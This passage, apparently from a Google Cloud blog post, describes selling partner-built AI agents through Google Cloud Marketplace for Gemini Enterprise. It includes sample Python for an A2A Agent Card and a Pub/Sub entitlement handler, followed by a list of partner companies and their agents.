Enterprise-grade governance: Administrators can manage which agents can be deployed and accessed through Gemini Enterprise according to their policies. If administrators want to manage access and cost control for third-party agents along with other Google Cloud Marketplace solutions, such as datasets, agent tools, infrastructure, and SaaS solutions, they can continue to do so through Identity and Access Management (IAM) and Private Marketplace capabilities.
For partners: Reach enterprise customers faster
For partners, making AI agents available in Gemini Enterprise creates an additional go-to-market approach where enterprise customers can adopt partner-built solutions securely and reliably. We’ve simplified partner onboarding for AI agents as a service, letting builders focus on innovation while Google Cloud Marketplace handles the transactions. The setup is straightforward.
Simplified onboarding with Agent Cards: Getting started requires only a link to your Agent Card – a standard JSON file based on the Agent2Agent (A2A) protocol. Google Cloud Marketplace automatically ingests the agent's metadata, capabilities, and endpoints, significantly reducing listing process complexity.
Clear agent validation framework: Google Cloud has also enhanced our AI agent ecosystem program, providing a clear framework for partners to validate that their agents use A2A and Gemini. We’ve also introduced the new “Google Cloud Ready – Gemini Enterprise” designation to recognize agents that meet our highest standards for performance and quality, helping accelerate adoption of trusted solutions and giving partners a new path to commercialize their agents.
Flexible monetization: Partners can choose the business model that works best for their customer use cases. Options include self-serve agents with standard subscription-based pricing, usage-based pricing or custom pricing through Private Offers. Partners can also position agents as extensions to their existing SaaS platforms, offering them to customers with appropriate entitlements. Outcome-based pricing models are also supported, allowing partners to monetize based on business outcomes, such as number of anomalies detected, reports generated, customer support tickets resolved, and more.
Automated entitlement and billing: When customers make a purchase, the platform instantly notifies partner systems of new entitlements through automated Pub/Sub notifications and the Cloud Commerce Partner Procurement API. This enables automatic customer provisioning and user access authorization without manual intervention; a sketch of a partner-side handler follows this list.
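To make the Agent Card concept concrete, here is a minimal, hypothetical sketch of what such a card might contain, built in Python and serialized to JSON. The field names follow the publicly documented A2A schema, but the agent name, endpoint URL, and skill are placeholders rather than a real listing; consult the A2A specification and Marketplace onboarding documentation for the authoritative format.

```python
# Illustrative A2A Agent Card, written out as the JSON file a Marketplace
# listing would link to. Field names follow the public A2A schema; the agent,
# URL, and skill below are hypothetical placeholders.
import json

agent_card = {
    "name": "Invoice Review Agent",              # placeholder agent name
    "description": "Flags anomalies in supplier invoices.",
    "url": "https://agents.example.com/a2a",     # placeholder A2A endpoint
    "version": "1.0.0",
    "capabilities": {"streaming": True, "pushNotifications": False},
    "defaultInputModes": ["text"],
    "defaultOutputModes": ["text"],
    "skills": [
        {
            "id": "invoice-anomaly-detection",
            "name": "Invoice anomaly detection",
            "description": "Reviews invoices and reports likely anomalies.",
            "tags": ["finance", "compliance"],
        }
    ],
}

# Serialize the card so it can be hosted at the URL shared with Google Cloud Marketplace.
with open("agent.json", "w", encoding="utf-8") as f:
    json.dump(agent_card, f, indent=2)
```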
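And here is a minimal sketch of the partner-side automation described above: a Pub/Sub subscriber that reacts to a new-entitlement notification, provisions the customer in the partner’s own systems, and approves the entitlement through the Cloud Commerce Partner Procurement API. The subscription path, provider ID, and event fields are assumptions for illustration and should be confirmed against the Partner Procurement API documentation.

```python
# Minimal sketch of a partner-side entitlement listener, assuming:
#   - a Pub/Sub subscription wired to Marketplace procurement notifications
#   - the Cloud Commerce Partner Procurement API enabled for the provider
# The subscription path, provider ID, and message fields are illustrative.
import json

from google.cloud import pubsub_v1
from googleapiclient import discovery

PROVIDER_ID = "example-provider"  # hypothetical provider ID
SUBSCRIPTION_PATH = "projects/example-project/subscriptions/marketplace-events"

procurement = discovery.build("cloudcommerceprocurement", "v1")


def handle_message(message):
    """Provision the customer for a newly requested entitlement, then approve it."""
    event = json.loads(message.data.decode("utf-8"))
    if event.get("eventType") == "ENTITLEMENT_CREATION_REQUESTED":
        entitlement_id = event["entitlement"]["id"]
        name = f"providers/{PROVIDER_ID}/entitlements/{entitlement_id}"
        # ... create the customer's account and grant user access in the partner system ...
        procurement.providers().entitlements().approve(name=name, body={}).execute()
    message.ack()


subscriber = pubsub_v1.SubscriberClient()
streaming_pull = subscriber.subscribe(SUBSCRIPTION_PATH, callback=handle_message)
streaming_pull.result()  # block and process notifications until interrupted
```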
Leading companies building AI agents today
Here are some of the leading companies building AI agents for Gemini Enterprise. These partners represent different industries and use cases, showing the breadth of solutions already available to enterprise customers.
Amplitude: Amplitude AI Agents work 24/7 as extensions of product, marketing, and data teams: analyzing behavior, proposing experiments, optimizing experiences, and tracking impact with speed and confidence.
Avalara: Avalara Agentic Tax and Compliance™ automates compliance across the business ecosystem. Avi, an always-on Avalara Agent for compliance, goes beyond assisting to doing the work: observing, advising, and executing within the environments where business happens.
Box: The Box AI Agent lets users ask questions, summarize complex documents, extract data from files, and generate new content while respecting existing permissions in Box.
CARTO: CARTO’s Site Selection for Gemini Enterprise agent aids the analysis and comparison of physical commercial sites for retail, real estate, finance, and other businesses looking to expand or manage their real-world footprint.
Cotality: Cotality’s Payoff Analysis AI Agent empowers mortgage lenders and servicers to strengthen retention strategies and reduce portfolio runoff. It leverages origination and payoff data to deliver instant intelligence on loan transactions and subsequent activities, competitor wins, and recapture performance.
Dun & Bradstreet: Dun & Bradstreet’s Look Up agent uses the globally trusted D-U-N-S® Number and advanced identity resolution to identify and match entities across internal and third-party sources, delivering a unified view of business relationships and enabling accurate, efficient data integration across enterprise workflows like marketing, sales, compliance, and risk management.
Dynatrace: Dynatrace’s A2A integration connects its observability platform via the A2A protocol, enabling advanced analysis and automated incident response. It unifies Dynatrace AI with an organization’s chosen agents to accelerate problem remediation and prevention, while automatically optimizing cloud environments.
Elastic: The Elastic AI Agent provides fast, high-quality retrieval across structured and unstructured data. It helps analyze large volumes of records, technical support issues, and security incidents or alerts to accelerate investigation tasks. Uncover threats, find emerging product issues, and understand customer trends through the Elastic AI Agent.
Fullstory: Fullstory’s internal workflow agent analyzes and quantifies gaps in organizations’ business processes and software workflows to help determine the most impactful fixes. By pinpointing where employees face the highest friction, Fullstory’s agent shows teams exactly where to deploy AI to cut costs and boost productivity.
HCLTech: The HCLTech Netsight AI Agent on Google Cloud delivers virtual network troubleshooting for RAN networks, providing autonomous analysis to identify network anomalies, root causes, and bottlenecks. Netsight analyzes data in near real time, combining configuration data, performance analysis, and historical trend data to proactively address issues and improve network performance.
HubSpot: The HubSpot Academy Agent is an AI-powered assistant that brings HubSpot knowledge and documentation directly into Gemini Enterprise. By making trusted, source-linked guidance instantly accessible, it helps users get answers, learn best practices, and work with confidence in HubSpot.
Invideo: Invideo’s Video AI lets users create videos of any length and type using just prompts. Its multi-agent system assigns specialized AI agents to every stage of production, optimizing creation and ensuring coherent output. Marketers and content creators can now produce videos that look like million-dollar productions, effortlessly and with confidence.
Manhattan Associates: The Solution Navigator agent provides instant answers on Manhattan Active solutions, policies, and operations to accelerate response times and efficiency.
Optimizely: Optimizely Opal, available on Google Cloud Marketplace, is the agent orchestration platform built for marketers, connecting data, content, and workflows to power intelligent automation across the Optimizely ecosystem. With pre-built and custom agents, drag-and-drop workflow design, and Gemini-powered reasoning, Opal helps teams scale marketing performance faster, with greater precision.
Orion by Gravity: A proactive AI analyst for enterprises. Business users can ask Orion any question, and behind the scenes it runs deep, multi-agent analysis. Accurate, context-aware, and proactive, Orion detects anomalies, surfaces insights, and even asks its own questions, delivering faster, smarter decisions.
Pegasystems: The Pega Self Study Agent enables enterprises to unlock insights from Pega technical documentation and enablement directly in Gemini Enterprise, allowing Pega enthusiasts to quickly get the answers they need to build, manage, and troubleshoot their applications. It provides real-time access to Pega’s publicly available technical documentation, learning courses, and marketing and enablement content.
Quantiphi: Quantiphi’s sQrutinizer is an agentic intent optimization framework that supercharges Conversational Agent performance. A semi-automated workbench monitors fallbacks and false positives, retraining the agent in a closed-loop system. This helps customer experience teams proactively enhance accuracy and unlock the full potential of their Google Cloud agents.
Quantum Metric: Felix AI Agentic acts as a 24/7 digital analyst, turning fragmented customer data into clear answers and next steps for every employee.
S&P Global: The Data Retrieval agent helps users analyze earnings calls, perform market research, and retrieve financial metrics, all with direct source citations.
Supermetrics: The Supermetrics Marketing Intelligence Agent facilitates deep, cross-channel data exploration and analysis. It simplifies your marketing data so that anyone can search, explore, and find the answers they need.
Trase Systems: The Trase AI Agent Platform tactically delivers and implements end-to-end AI agent applications to automate complex administrative workflows. Trase replaces manual, repetitive processes with autonomous AI agents that are highly secure, audit-ready, and proven to deliver measurable ROI through a shared savings model.
UiPath: UiPath multi-agent capabilities power seamless collaboration among intelligent agents to automate complex processes. The Medical Record Summarization agent extracts and structures medical data and leverages the A2A protocol. UiPath will extend A2A integration across all agents in its orchestrator, enhancing scalability, efficiency, and human-in-the-loop decision-making.
Get started
The way enterprises deploy AI is changing rapidly. Google Cloud Marketplace represents an important step in building a trusted ecosystem where AI agents and agent tools work together reliably for enterprise use.
Looking for AI agents? Search for agents in our discovery tool.
Ready to sell agents through Google Cloud Marketplace? Get started today.
Interested in building Google Cloud Ready – Gemini Enterprise agents? Learn about our enhanced AI Agent Program and reach customers globally.